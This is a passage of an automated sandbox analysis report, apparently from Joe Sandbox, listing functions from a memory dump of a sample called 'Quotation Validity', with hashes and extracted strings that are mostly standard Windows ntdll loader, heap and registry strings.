                                                                                • LdrpCompleteMapModule, xrefs: 013DA590
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                • API String ID: 0-1676968949
                                                                                • Opcode ID: 0f5462dd14a139961bdea1e95d3f25e30e14ea549adff8cacd3adbcaa4e970c1
                                                                                • Instruction ID: 2f3ec2b3c37985edb60409d818873167b2541ff247a048d53b4f1e324c57574d
                                                                                • Opcode Fuzzy Hash: 0f5462dd14a139961bdea1e95d3f25e30e14ea549adff8cacd3adbcaa4e970c1
                                                                                • Instruction Fuzzy Hash: DC51E571A04746DBEB22DB6CCA44B267BE9BF4073CF180558EE51AB6E2D774E940C780
                                                                                Function 0136758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                • API String ID: 0-1151232445
                                                                                • Opcode ID: db25c0c57a8e87277026c8fb765b6037cbe99e4a79f45b4804e02d22f0798241
                                                                                • Instruction ID: b02b91131a41262f4fed8c451b8ecabceb7866891499593cc5bda4650fdaef49
                                                                                • Opcode Fuzzy Hash: db25c0c57a8e87277026c8fb765b6037cbe99e4a79f45b4804e02d22f0798241
                                                                                • Instruction Fuzzy Hash: 964125713002858FFF35CA1DC8847B97BE89F0265CF58C06DD5468B69AE674DC89CB51
                                                                                Function 0142C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • PreferredUILanguages, xrefs: 0142C212
                                                                                • @, xrefs: 0142C1F1
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0142C1C5
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                • API String ID: 0-2968386058
                                                                                • Opcode ID: c59e92d01aa7892040c1bb86f72a39192892903024f16f79e0fe2a642f52e320
                                                                                • Instruction ID: 2347bc147a92be5783c010f8bbf54103ef2789b87dee16b28eaf0dc0f6de3e8b
                                                                                • Opcode Fuzzy Hash: c59e92d01aa7892040c1bb86f72a39192892903024f16f79e0fe2a642f52e320
                                                                                • Instruction Fuzzy Hash: 6B416271E00219EBDF11DBD8C881FEFBBB8AB15704F54416BE609B7250DB749A85CB60
                                                                                Function 01404144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                • API String ID: 0-1373925480
                                                                                • Opcode ID: 1bee8227e86f6c1a0ebf7f20e3f6dd974363e48d908f579fd1a37c128e8349b3
                                                                                • Instruction ID: 0ee55f8aa7839091a74956fc504b59128a7eca790d3e58aa1c1df9a83d6f5c5f
                                                                                • Opcode Fuzzy Hash: 1bee8227e86f6c1a0ebf7f20e3f6dd974363e48d908f579fd1a37c128e8349b3
                                                                                • Instruction Fuzzy Hash: 3E41E531A043498BEB26DBEAC844BADBBB4FF55744F18046ADA01EF7E1D7349901CB51
                                                                                Function 013A33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RtlCreateActivationContext, xrefs: 013E29F9
                                                                                • SXS: %s() passed the empty activation context data, xrefs: 013E29FE
                                                                                • Actx , xrefs: 013A33AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                • API String ID: 0-859632880
                                                                                • Opcode ID: 295de4f5b612a49cf10b9301a074f0e020ab60bd73997a8b8d5b6e74e236924a
                                                                                • Instruction ID: 3a80d73716035a45db437110fd89070db24aff3dc531a11fff7b365bf3efaecc
                                                                                • Opcode Fuzzy Hash: 295de4f5b612a49cf10b9301a074f0e020ab60bd73997a8b8d5b6e74e236924a
                                                                                • Instruction Fuzzy Hash: 383101366003169FEB26DF58C884BA67BE8FB44718F558429EE04AF281CB70E851C790
                                                                                Function 013FB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 013FB632
                                                                                • GlobalFlag, xrefs: 013FB68F
                                                                                • @, xrefs: 013FB670
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                • API String ID: 0-4192008846
                                                                                • Opcode ID: 0147e6c786908473c2c18e7044b61bd248ec45d5998a3319cb57fefde5f2aeaf
                                                                                • Instruction ID: 169b4159ec4d0458abf669a73a39b46566dd147212ea3d023ed400f695caf287
                                                                                • Opcode Fuzzy Hash: 0147e6c786908473c2c18e7044b61bd248ec45d5998a3319cb57fefde5f2aeaf
                                                                                • Instruction Fuzzy Hash: 79313BB1A00209AEDB10EF99CC80AEFFBBCEF44758F140469E705A6650E7749A44CBA4
                                                                                Function 013B1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 013B127B
                                                                                • @, xrefs: 013B12A5
                                                                                • BuildLabEx, xrefs: 013B130F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 0-3051831665
                                                                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                • Instruction ID: 0f14ca57541ade33b62610d0b48eab1acc3e327fce9e4f8b57e036b986511972
                                                                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                • Instruction Fuzzy Hash: 3231A47290021DABDF12EF99CC94EDFBBBDEB94718F004425E604A76A0F730EA059B50
                                                                                Function 013803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: #%u
                                                                                • API String ID: 48624451-232158463
                                                                                • Opcode ID: 95752b66f14d8ed7e0b31163d77c324826f0d4935399d941380d3b730b2f62eb
                                                                                • Instruction ID: 46fbf0ea37aa574507c04da83497345dfc733d9e37da7e7bb3636ad581beae46
                                                                                • Opcode Fuzzy Hash: 95752b66f14d8ed7e0b31163d77c324826f0d4935399d941380d3b730b2f62eb
                                                                                • Instruction Fuzzy Hash: 17714B72A0124A9FDB05DFACD990BAEB7F8BF18708F144065E905E7651EB34EE05CB60
                                                                                Function 013852A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@
                                                                                • API String ID: 0-149943524
                                                                                • Opcode ID: 955accb6171473f3a0df0396e4b30fbf1f2230a8880adb6d585c69db88ee11e9
                                                                                • Instruction ID: 93f47e359b78d350bd0d73cb2be906ee166854febd12413c57bfbdee5a40ece5
                                                                                • Opcode Fuzzy Hash: 955accb6171473f3a0df0396e4b30fbf1f2230a8880adb6d585c69db88ee11e9
                                                                                • Instruction Fuzzy Hash: 4E32DFB16083118BDB24EF18C480B7EBBE5EF8475CF14492EFA9697290E734D984CB52
                                                                                Function 0143A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `$`
                                                                                • API String ID: 0-197956300
                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                • Instruction ID: 4f84caa1861c81eac7b3b804fcf71bd4dcf41cac3c6d415eba549629057f85bf
                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                • Instruction Fuzzy Hash: 39C1E3312443429BE725CF29C844B6BBBE5AFD8318F284A2EF6D6CB2A0D774D505CB41
                                                                                Function 0137A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0137A309
                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0137A2FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                • API String ID: 0-2876891731
                                                                                • Opcode ID: e61f6816ccc3cd9f9c42a127d1067c0bbe9de91787e34c755240f6f32ec79fa4
                                                                                • Instruction ID: 17f66faef538d65bb496e9d65f2462b597e0790d39bff04419c392483a974372
                                                                                • Opcode Fuzzy Hash: e61f6816ccc3cd9f9c42a127d1067c0bbe9de91787e34c755240f6f32ec79fa4
                                                                                • Instruction Fuzzy Hash: 47419031A04649DBEB25DF6DD480B6E7BB4FF84708F184069E910DB791E3B9D940CB50
                                                                                Function 014035BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                • API String ID: 0-118005554
                                                                                • Opcode ID: d7e6e43b075bd1d971d18b1cd32412bef5d029332aab9fa9e8c90c32f5609c5e
                                                                                • Instruction ID: e055df367dc11e2a3a1685c71b8c56e32871ebebc6d23917e81111dc85098089
                                                                                • Opcode Fuzzy Hash: d7e6e43b075bd1d971d18b1cd32412bef5d029332aab9fa9e8c90c32f5609c5e
                                                                                • Instruction Fuzzy Hash: 233161316087419FD322DF6AD854B2ABBE4FF95718F04086AF9588B3E1EB34D905CB52
                                                                                Function 013A329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .Local\$@
                                                                                • API String ID: 0-380025441
                                                                                • Opcode ID: bf580d3ddd2fb5c208d292b8c0f58f8131eb03f26e1ad7df9f9d488475ddd65c
                                                                                • Instruction ID: 76d0307c0945312e7be02b6c8c4c8fbcc15d29541a89acd9fe95b60a1c7eb07b
                                                                                • Opcode Fuzzy Hash: bf580d3ddd2fb5c208d292b8c0f58f8131eb03f26e1ad7df9f9d488475ddd65c
                                                                                • Instruction Fuzzy Hash: EC318FB250C3059FC711DF28C880A6BBBE8FF84758F80092EF99583790EA35DD048B92
                                                                                Function 013AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                • API String ID: 2994545307-4008356553
                                                                                • Opcode ID: 817eb1d843bafd2018711b5dc57eb912ef71b8905b58ce9107b10d6465984c80
                                                                                • Instruction ID: 0c37bca9f1774e7965ac6db145f1ed959e56786c509af2af66f7637db668040d
                                                                                • Opcode Fuzzy Hash: 817eb1d843bafd2018711b5dc57eb912ef71b8905b58ce9107b10d6465984c80
                                                                                • Instruction Fuzzy Hash: C401D1B3650704AFD311DF14CE45B1677E8E794B2DF018939E658C75A0E374E804CB46
                                                                                Function 0141A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 9075b26d43ba1c08765ce3e3624b392074f79ce33e2f8d63d4ca4d1fc845deaf
                                                                                • Instruction ID: eb549f1dbc6f493bc2905f594a390676aebccafe71f7355107f8efe1f46d97e6
                                                                                • Opcode Fuzzy Hash: 9075b26d43ba1c08765ce3e3624b392074f79ce33e2f8d63d4ca4d1fc845deaf
                                                                                • Instruction Fuzzy Hash: FD22BF702066E18BEB25CF2DC054372BBF1AF44304F28885BD9968B3AED735E552CB61
                                                                                Function 01377370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 511105d33af3e88ae6210643eb2987a5a4ab9bccfc62ebc6e44842837c86fc7b
                                                                                • Instruction ID: 011b462a68cbdd3b4b8ae53d976993dfc03e4da19cd8d909ccbac323b1955a8b
                                                                                • Opcode Fuzzy Hash: 511105d33af3e88ae6210643eb2987a5a4ab9bccfc62ebc6e44842837c86fc7b
                                                                                • Instruction Fuzzy Hash: 01A19AB1608346CFD321DF28D484A2ABBF5FF98318F14492EE5859B361E734E945CB92
                                                                                Function 013F6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 039e51d06d5b9b1cc1f90f0234d1946ff186a5682f3d004bd8156200ea5fbbf5
                                                                                • Instruction ID: 1439d21bc49a1c7853353ffa10e8b4b7bccb5662c7435f3d39924b16ea409234
                                                                                • Opcode Fuzzy Hash: 039e51d06d5b9b1cc1f90f0234d1946ff186a5682f3d004bd8156200ea5fbbf5
                                                                                • Instruction Fuzzy Hash: C69163B2A00219AFDB21DB99CC85FAE7BB9EF15B54F100069F704BB191D775AD00CB50
                                                                                Function 0142B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PreferredUILanguages
                                                                                • API String ID: 0-1884656846
                                                                                • Opcode ID: 2800a7649dc2236d68f89704be5fbd3784aae134e5c52cea0b2d1407e30b583c
                                                                                • Instruction ID: 6a3781ecbc57177dbf0b575c580c58408b00d319d7a0f21b74a1f78d07b8f6d1
                                                                                • Opcode Fuzzy Hash: 2800a7649dc2236d68f89704be5fbd3784aae134e5c52cea0b2d1407e30b583c
                                                                                • Instruction Fuzzy Hash: 5441B232D00629ABDF11DA98C840BEFBBB9EF44614F454167EE11E7360D670DE80C7A4
                                                                                Function 0141705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: kLsE
                                                                                • API String ID: 0-3058123920
                                                                                • Opcode ID: b72671c5fc758201f50845887fdb31e61db643d86d8cc6d8e11115b37bc89971
                                                                                • Instruction ID: 1a292fa5e419fc585a884c451c1f5830d892265d7afcd01ffe4f39244514ae4a
                                                                                • Opcode Fuzzy Hash: b72671c5fc758201f50845887fdb31e61db643d86d8cc6d8e11115b37bc89971
                                                                                • Instruction Fuzzy Hash: A6417C7110134257F731AF69E8847A63F94E75072DF19021EED549A2FDCB7448C6C7A2
                                                                                Function 013A7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                • Instruction ID: e9de7778b98ad2782dce13785a722fe528daf9047c864c557bfa41274bfae2e8
                                                                                • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                • Instruction Fuzzy Hash: 7341D075A0065AEBCF21DF48C494BBEB7B8FF84719F40405AE981A7240DB35D941CBE1
                                                                                Function 01375096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Actx
                                                                                • API String ID: 0-89312691
                                                                                • Opcode ID: 9131cd78555320345a27c577a062f0709f2a2bab4c22b9ffca3452464921a4cd
                                                                                • Instruction ID: 8c134e50ebffcaf5606bd32e7190fa6c7a889c30f563aded833261ca15871b11
                                                                                • Opcode Fuzzy Hash: 9131cd78555320345a27c577a062f0709f2a2bab4c22b9ffca3452464921a4cd
                                                                                • Instruction Fuzzy Hash: AB110431B4820A8FEB3E4D1D9850636B7D9EB9562CF34813AE562DF791D67ADC41C380
                                                                                Function 013F106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrCreateEnclave
                                                                                • API String ID: 0-3262589265
                                                                                • Opcode ID: ddd9214599cdc7d2e4affcb948f6adba6278a776eead6c4d223d19d72340736e
                                                                                • Instruction ID: f4c11e756393c3d198c320da36135e5574cde2ed469bfacc1af16369d8cafcc2
                                                                                • Opcode Fuzzy Hash: ddd9214599cdc7d2e4affcb948f6adba6278a776eead6c4d223d19d72340736e
                                                                                • Instruction Fuzzy Hash: 732123B16083449BC320DF1A9844A5BFBE8FBD5B08F004A1FFA9496260D7B19448CB92
                                                                                Function 013C739A Relevance: .7, Instructions: 705COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c9274988638b944f49f7beda37686537f75994b6296cb6e8ad835c8290401984
                                                                                • Instruction ID: cceb75ab8e4a86c082cf197f2c81a8840d72fb4331fcb41632b5a71e9de9173c
                                                                                • Opcode Fuzzy Hash: c9274988638b944f49f7beda37686537f75994b6296cb6e8ad835c8290401984
                                                                                • Instruction Fuzzy Hash: A7428E71A006168FDB19CF5DC490AAEBBB6FF98B18B14815DD952AB350D734EC42CF90
                                                                                Function 0139B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a69c2c00abb0b9670cad6d54a680d9869518d5da81593063647012ce260f2e74
                                                                                • Instruction ID: 6b21bd2832b960736d15b9c82ae19af8d83ce0436b144fe974a2614c1ec40229
                                                                                • Opcode Fuzzy Hash: a69c2c00abb0b9670cad6d54a680d9869518d5da81593063647012ce260f2e74
                                                                                • Instruction Fuzzy Hash: 8A32A172E00219DBDF24DF98E890BEEBBB5FF54718F180029E905AB395E7359901CB91
                                                                                Function 01408158 Relevance: .6, Instructions: 617COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 26db819e5e3cf1bbdbc7ec30d58d39ff8d17895c415899d9cfc6fe8f738c99bc
                                                                                • Instruction ID: cd7a01379d1fc7062a23c5cda18947395940f41093a11b015bec06fdee2322d0
                                                                                • Opcode Fuzzy Hash: 26db819e5e3cf1bbdbc7ec30d58d39ff8d17895c415899d9cfc6fe8f738c99bc
                                                                                • Instruction Fuzzy Hash: 3A426275E002198FEB25CF69C941BAEBBF5BF44304F1580AAE949EB391D7349981CF50
                                                                                Function 013765D0 Relevance: .4, Instructions: 383COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ee209cfc7413811b177a0255a6a32bf70c027222f75341b4d5d7d222f72ab69d
                                                                                • Instruction ID: 8e9bc2b320d53b9e18e34410a7600805df20457a3b31a89edf054ced48e81cde
                                                                                • Opcode Fuzzy Hash: ee209cfc7413811b177a0255a6a32bf70c027222f75341b4d5d7d222f72ab69d
                                                                                • Instruction Fuzzy Hash: 2DE1AFB1508742CFD725CF28C0A0A6AFBE4FF89318F04896DE99597351EB35E905CB92
                                                                                Function 01368397 Relevance: .4, Instructions: 380COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7f8d2b339995928b5e1f5b98d9b96df92bfe85f932fd3d78b10a472aea9c9636
                                                                                • Instruction ID: 311af4c408188557982b44c1ef6f931ca39f278bb9aa548f78a1ba45823ed1ee
                                                                                • Opcode Fuzzy Hash: 7f8d2b339995928b5e1f5b98d9b96df92bfe85f932fd3d78b10a472aea9c9636
                                                                                • Instruction Fuzzy Hash: BDD10571A0030ADBDB14DF28C881ABAB7B9BF5875CF04856DEA11DB288E734D951CB50
                                                                                Function 0138F460 Relevance: .3, Instructions: 321COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c01a3fae5b0c2fd7ce9cc3eee77dead3d5dc38c3ba04efd78110b3409f217b0a
                                                                                • Instruction ID: 26117113ff9d26b50336731cd5c064b6c3df89af5946760ce2c6d9db30f375be
                                                                                • Opcode Fuzzy Hash: c01a3fae5b0c2fd7ce9cc3eee77dead3d5dc38c3ba04efd78110b3409f217b0a
                                                                                • Instruction Fuzzy Hash: 84C13631A00315CBDB24EF2CC4907B977A9FF84B2CF1A4259ED42AB7A6D7348950CB60
                                                                                Function 01380535 Relevance: .3, Instructions: 300COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
